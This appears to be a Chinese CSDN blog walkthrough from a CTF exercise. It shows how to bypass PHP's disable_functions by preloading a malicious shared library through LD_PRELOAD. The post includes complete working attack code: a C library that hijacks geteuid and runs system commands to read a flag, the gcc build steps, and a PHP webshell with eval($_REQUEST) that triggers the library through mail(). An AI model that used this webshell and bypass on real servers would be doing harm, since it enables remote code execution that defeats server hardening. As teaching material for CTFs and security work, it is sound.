LD_PRELOAD绕过disabled_functions限制

最新推荐文章于 2023-11-30 11:48:03 发布
最新推荐文章于 2023-11-30 11:48:03 发布
阅读量231 收藏
点赞数
文章标签: linux java php python js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/115401089
版权

LD_PRELOAD绕过disabled_functions限制

思路分析

根据资料可得知有四种绕过 disable_functions 的手法:

  1. 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等
  2. 寻找未禁用的漏网函数,常见的执行命令的函数有 system()exec()shell_exec()passthru(),偏僻的 popen()proc_open()pcntl_exec(),逐一尝试,或许有漏网之鱼
  3. mod_cgi 模式,尝试修改 .htaccess,调整请求访问路由,绕过 php.ini 中的任何限制(让特定扩展名的文件直接和php-cgi通信);
  4. 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。

这里我们只详细学习第四种方法。大致步骤如下

  • 生成一个我们的恶意动态链接库文件
  • 利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径
  • 配合php的某个函数去触发我们的恶意动态链接库文件
  • RCE并获取flag

这里面的某个函数需要在运行的时候能够启动子进程,这样才能重新加载我们所设置的环境变量,从而劫持子进程所调用的库函数。

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

putenv()用来改变或增加环境变量的内容. 参数string 的格式为name=value, 如果该环境变量原先存在, 则变量内容会依参数string 改变, 否则此参数内容会成为新的环境变量.

动态链接库

hack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
	system("cat /flag >> /var/www/html/test.php");
	system("tac /flag >> /var/www/html/test.php");
	system("/readflag >> /var/www/html/test.php");
}   
int  geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}

利用gcc编译

gcc -c -fPIC hack.c -o hack
gcc -shared hack -o hack.so

配合php执行动态链接

shell.php

<?php
  @eval($_REQUEST['ant']);
  putenv("LD_PRELOAD=/tmp/hack.so");
  error_log("admin",1);
  mail("admin@localhost","","","","");
?>

在执行文件目录建立一个test.php

浏览器访问shell.php,再访问test.php,即可发现flag

tomyyyyy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用ld_preload方式绕过disable_functions
Jiajiajiang_的博客
08-06 1163
参考链接:https://github.com/l3m0n/Bypass_Disable_functions_Shell 连了菜刀无法执行命令系列。 去看phpinfo(别问我怎么看,你都能上传一句话了,phpinfo不是问题 好家伙!禁用了这么多函数,这可咋整 行我去找方法了, 试过了pcntl_exec的方法,没有成功,来用ld_preload绕过(mail 啥也别说了,上马 ...
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
`LD_PRELOAD`是一个强大的Linux技巧,它允许我们修改或扩展动态链接器的行为。本篇文章将深入探讨`openredir`项目,它是如何利用`LD_PRELOAD`来重定向文件打开操作的。 首先,让我们理解`LD_PRELOAD`的概念。`LD_...
通过LD_PRELOAD绕过disable_functions
蚁景网安学院
10-14 1171
0x00 前言前段时间碰到拿到shell以后限制了basedir并且无法执行命令的情况,解决办法是上传恶意的.so文件,并通过设置LD_PRELOAD,然后调用新进程来加载恶意.so文件...
ld链接时提示接口未实现_通过LD_PRELOAD绕过disable_functions
weixin_39999859的博客
11-21 108
原创: Mr.zhang 合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ0x00 前言前段时间碰到拿到shell以后限制了basedir并且无法执行命令的情况,解决办法是上传恶意的.so文件,并通过设置LD_PRELOAD,然后调用新进程来加载恶意.so文件,达...
php ld preload,利用环境变量LD_PRELOAD绕过php disable_function执行系统命令
weixin_36397146的博客
03-17 363
0x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个绕过思路,希望你能在实际测试中派上用场。0x02 绕过思路严苛环境下php设置的disable_function如下:dlexecsystempassth...
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
这里的"PRELOAD:LD_PRELOAD rootkit实用程序"是指利用`LD_PRELOAD`环境变量来加载一个自定义的动态链接库(`.so`文件),从而在系统调用层面进行hook或注入代码,实现对目标程序的控制或监控。这在某些情况下可以...
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
**免费检查器(Free Checker)**是一个针对C语言程序的简单内存泄漏检测工具,它巧妙地利用了Linux动态链接器的特性——`LD_PRELOAD`。这个工具的主要目的是帮助程序员定位并解决C语言编程中常见的内存泄漏问题。...
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
go-ldpreload-backdoor:使用Go进行LD_PRELOAD libc挂钩
02-05
使用Go LD_PRELOAD libc挂钩 这是在共享库中使用Go封装libc函数并启动TCP服务器(&ldquo;后门”)的实验,该服务器允许从客户端(如telnet或netcat)运行任意命令。 这是一款用于教育目的的玩具,可演示Go的某些功能。 ...
利用 LD_PRELOAD劫持动态链接库,绕过 disable_function
最新发布
qq_68163788的博客
11-30 1389
LD_PRELOAD是一个环境变量,它允许用户在程序加载动态链接库(共享对象)时指定要预先加载的库。这个功能可以用来替换程序中的特定函数,或者添加额外的功能。 使用LD_PRELOAD可以在不修改源代码的情况下,对程序的行为进行修改。这对于调试、性能分析或者添加额外的安全检查非常有用。例如,可以使用LD_PRELOAD来替换标准库中的malloc和free函数,从而实现内存泄漏检测或者统计内存使用情况。 需要注意的是,LD_PRELOAD只对动态链接的程序有效
PHP绕过LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1551
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数库链接完毕叫做静态链接,而动态链接则是编译过程中不进行链接操作,在程序运行时再动态的载入函数库.不管是静态链接还是动态链接,目的都很明确,载入函数库. LD_PRELOAD是与载入函数库相关的...
从一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1584
前两天做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的进程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
无字母数字RCE与LD_PRELOADdisable_functions
D.MIND 的博客
04-19 1164
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
利用环境变量LD_PRELOAD绕过php disable_function执行系统命令
weixin_33738982的博客
03-08 929
YiYang · 2016/05/20 15:550x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个绕过思路,希望你能在实际测试中派上用场。0x02 绕过思路严苛环境下php设置的disable_func...
绕过disable_function
qq_51770207的博客
09-22 4097
绕过disable_function
Linux中常见的过滤拦截
FinixLei的专栏 (https://github.com/FinixLei)
05-15 1725
Linux中常见的拦截过滤 本文着重介绍Linux平台上常见的拦截: 用户态动态库拦截。 内核态系统调用拦截。 堆栈式文件系统拦截。 inline hook拦截。 LSM(Linux Security Modules) eBPF Hook拦截。(本文新增) 动态库劫持 Linux上的动态库劫持主要是基于LD_PRELOAD环境变量,这个环境变量的主要作用是改变动态库的加载顺序,让用户有选择的载入不同动态库中的相同函数。但是使用不当就会引起严重的
警惕UNIX下的LD_PRELOAD环境变量
ldong2007的专栏
09-03 866
转自陈皓原帖地址:http://blog.csdn.net/haoel  前言       也许这个话题并不新鲜,因为LD_PRELOAD所产生的问题由来已久。不过,在这里,我还是想讨论一下这个环境变量。因为这个环境变量所带来的安全问题非常严重,值得所有的Unix下的程序员的注意。在开始讲述为什么要当心LD_PRELOAD环境变量之前,请让我先说明一下程序的链接。所谓链接,也就是说编译器找到程序中
读《利用环境变量LD_PRELOAD绕过php disable_function执行系统命令》有感
一个码农的笔记
11-01 3086
今天看来一篇文章:http://cb.drops.wiki/wooyun/drops/tips-16054.html 复现了一下,感觉有点坑 我把复现的过程,结果和遇到问题在这里总结一下 我的实验环境是centos7 php 5.4 首先按照要求编译一个so 1.创建一个hehe.c #include #include #include void payload()
LD_PRELOAD
09-01
LD_PRELOAD是一个环境变量,用于在运行时强制加载指定的共享库文件。它的作用是在程序启动前加载指定的库文件,从而重定向或替换程序中的函数调用。通常使用unsetenv("LD_PRELOAD")来删除LD_PRELOAD环境变量,以避免进入无限循环的情况。LD_PRELOAD的优先级高于LD_LIBRARY_PATH,/etc/ld.so.cache,/lib和/usr/lib。LD_PRELOAD是在任何其他库之前加载的特定库的列表,而LD_LIBRARY_PATH是在加载任何程序必需的库时要搜索的目录列表。可以通过阅读man ld.so来获取更多关于这些环境变量以及其他影响动态链接器的环境变量的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [深入分析 LD_PRELOAD](https://blog.csdn.net/itworld123/article/details/125755603)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值